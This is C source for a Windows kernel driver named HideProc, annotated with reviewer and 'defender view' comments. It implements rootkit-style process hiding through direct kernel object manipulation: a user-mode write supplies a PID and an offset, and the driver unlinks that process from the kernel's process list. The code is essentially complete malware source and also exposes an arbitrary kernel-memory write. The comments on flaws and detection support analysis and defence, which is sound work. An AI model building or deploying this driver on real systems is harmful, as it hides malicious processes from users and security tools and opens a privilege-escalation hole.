  1. #include <ntddk.h>
  2. #include <ntifs.h>
  3.  
typedef unsigned int UINT;   // 32-bit unsigned; used for the PID and offset fields below
typedef int BOOL;

// Payload a user-mode client writes to the device in a single IRP_MJ_WRITE.
// Both fields are untrusted: they arrive straight from the caller's buffer
// and are used in HideProc_Write to derive a kernel address to write to.
typedef struct _hpstruct{
    UINT uPid;          // process id handed to PsLookupProcessByProcessId
    UINT uFlinkOffset;  // caller-supplied byte offset added to the EPROCESS address
}hpstruct;

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp);
VOID HideProc_Unload(PDRIVER_OBJECT DriverObject);
NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp);

// DriverEntry goes in discardable INIT memory; the dispatch and unload
// routines are placed in pageable memory.
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HideProc_Create)
#pragma alloc_text(PAGE, HideProc_Write)
#pragma alloc_text(PAGE, HideProc_Close)
#pragma alloc_text(PAGE, HideProc_Unload)
#pragma alloc_text(PAGE, HideProc_Unsupported)
  25.  
  26.  
/*
 * Driver entry point.
 *
 * Creates the control device \Device\HideProc, routes every major function
 * to HideProc_Unsupported except CREATE/WRITE/CLOSE, enables direct (MDL)
 * I/O on the device and publishes the \DosDevices\HideProc symbolic link.
 *
 * pRegistryPath is accepted but not used.
 * Returns the status of IoCreateDevice. The result of IoCreateSymbolicLink
 * is not checked, so a failure there is not reported to the caller.
 *
 * NOTE(review): no security descriptor is supplied for the device, so which
 * principals may open it depends on the default DACL IoCreateDevice assigns
 * — confirm before assuming only administrators can reach HideProc_Write.
 * The device and link names are visible to object-namespace enumeration,
 * which is a straightforward detection point for this driver.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath){
    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(L"\\Device\\HideProc");
    UNICODE_STRING dosName = RTL_CONSTANT_STRING(L"\\DosDevices\\HideProc");
    PDEVICE_OBJECT device = NULL;
    NTSTATUS status;
    UINT major;

    DbgPrint("HideProc DriverEntry Called\n");

    status = IoCreateDevice(pDriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN,
                            FILE_DEVICE_SECURE_OPEN, FALSE, &device);
    if(!NT_SUCCESS(status)){
        return status;
    }

    /* Default every dispatch slot first, then override the three handled ones. */
    for(major = 0; major < IRP_MJ_MAXIMUM_FUNCTION; major++){
        pDriverObject->MajorFunction[major] = HideProc_Unsupported;
    }
    pDriverObject->MajorFunction[IRP_MJ_CREATE] = HideProc_Create;
    pDriverObject->MajorFunction[IRP_MJ_WRITE]  = HideProc_Write;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE]  = HideProc_Close;
    pDriverObject->DriverUnload = HideProc_Unload;

    /* Direct I/O: write buffers reach HideProc_Write as an MDL. */
    device->Flags |= DO_DIRECT_IO;
    device->Flags &= ~DO_DEVICE_INITIALIZING;

    /* Return value intentionally not consulted (matches existing behaviour). */
    IoCreateSymbolicLink(&dosName, &deviceName);

    return status;
}
  53.  
/*
 * IRP_MJ_CREATE dispatch routine.
 * Logs the open and returns STATUS_SUCCESS; DeviceObject and Irp are not
 * used by this routine.
 */
NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    DbgPrint("HideProc_Create Called\n");
    return STATUS_SUCCESS;
}
  59.  
/*
 * IRP_MJ_WRITE dispatch routine.
 *
 * Expects the caller to write exactly sizeof(hpstruct) bytes; because the
 * device uses direct I/O the buffer arrives as an MDL. The PID is resolved
 * to an EPROCESS and the LIST_ENTRY located at <EPROCESS + uFlinkOffset> is
 * unlinked from its doubly-linked list and pointed back at itself. This is
 * a DKOM (direct kernel object manipulation) process-hiding technique.
 *
 * Security notes (defender view):
 *  - uFlinkOffset comes from user mode and is never validated, so any caller
 *    able to open the device gets an arbitrary kernel-memory write through
 *    this routine. The driver is therefore itself a privilege-escalation
 *    exposure, independent of its intended purpose.
 *  - All pointer arithmetic is done in ULONG, i.e. the code assumes a 32-bit
 *    kernel. On 64-bit Windows, driver signature enforcement and Kernel Patch
 *    Protection are the primary mitigations against this class of driver.
 *  - Detection: compare the process list against an independent view
 *    (handle tables, scheduler/thread data, process-creation telemetry) and
 *    alert on loads of a driver that creates \Device\HideProc.
 *
 * Returns STATUS_INVALID_PARAMETER when the stack location or MDL is missing
 * (or mapping the MDL fails), STATUS_BUFFER_TOO_SMALL on a length mismatch,
 * and STATUS_SUCCESS otherwise — see the note on the exception path below.
 */
NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp){
NTSTATUS NtStatus = STATUS_INVALID_PARAMETER;
PIO_STACK_LOCATION pIoStackIrp = NULL;
UINT dwDataWritten = 0;
ULONG dwEProcAddr;
PLIST_ENTRY pListProcs;
PEPROCESS pEProc;

hpstruct *hps;

DbgPrint("HideProc_Write Called\n");
pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);

/* DO_DIRECT_IO: the user buffer is described by Irp->MdlAddress. */
if(pIoStackIrp && Irp->MdlAddress){
/* Map the MDL into system space; returns NULL under resource pressure. */
hps = (hpstruct *)MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
if(hps){
/* Only the length is checked; the field values are not validated. */
if(pIoStackIrp->Parameters.Write.Length == sizeof(hpstruct)){
/* Takes a reference on the EPROCESS; nothing below releases it. */
if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){
DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
DbgPrint("Now hiding process %d...\n", hps->uPid);
dwEProcAddr = (ULONG) pEProc;
__try{
/* LIST_ENTRY at a caller-chosen offset inside the EPROCESS. */
pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset);
*((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink); //set flink of prev proc to flink of cur proc
/* ULONG* + 1 is +4 bytes, i.e. the Blink field only on a 32-bit kernel. */
*((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
DbgPrint("Process now hidden.\n");
}__except(EXCEPTION_EXECUTE_HANDLER){
NtStatus = GetExceptionCode();
DbgPrint("Exception: %d.\n", NtStatus);
}
/* Unconditionally overwrites any exception code recorded just above, so a
 * faulting write is still reported to the caller as success. */
NtStatus = STATUS_SUCCESS;
}
}else{
NtStatus = STATUS_BUFFER_TOO_SMALL;
}
/* Reported as written even on the STATUS_BUFFER_TOO_SMALL path. */
dwDataWritten = sizeof(hpstruct);
}
}

Irp->IoStatus.Status = NtStatus;
Irp->IoStatus.Information = dwDataWritten;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return NtStatus;
}
  106.  
/*
 * IRP_MJ_CLOSE dispatch routine.
 * Logs the close and returns STATUS_SUCCESS; DeviceObject and Irp are not
 * used by this routine.
 */
NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    DbgPrint("HideProc_Close Called\n");
    return STATUS_SUCCESS;
}
  112.  
/*
 * Driver unload routine.
 * Removes the \DosDevices\HideProc symbolic link and then deletes the device
 * object recorded on the driver object. Neither return value is checked.
 */
VOID HideProc_Unload(PDRIVER_OBJECT DriverObject){
    UNICODE_STRING dosName = RTL_CONSTANT_STRING(L"\\DosDevices\\HideProc");

    DbgPrint("HideProc_Unload Called\n");
    IoDeleteSymbolicLink(&dosName);
    IoDeleteDevice(DriverObject->DeviceObject);
}
  120.  
/*
 * Catch-all dispatch routine installed for every major function that the
 * driver does not handle. Logs the call and returns STATUS_NOT_SUPPORTED;
 * DeviceObject and Irp are not used by this routine.
 */
NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    DbgPrint("HideProc_Unsupported Called\n");
    return STATUS_NOT_SUPPORTED;
}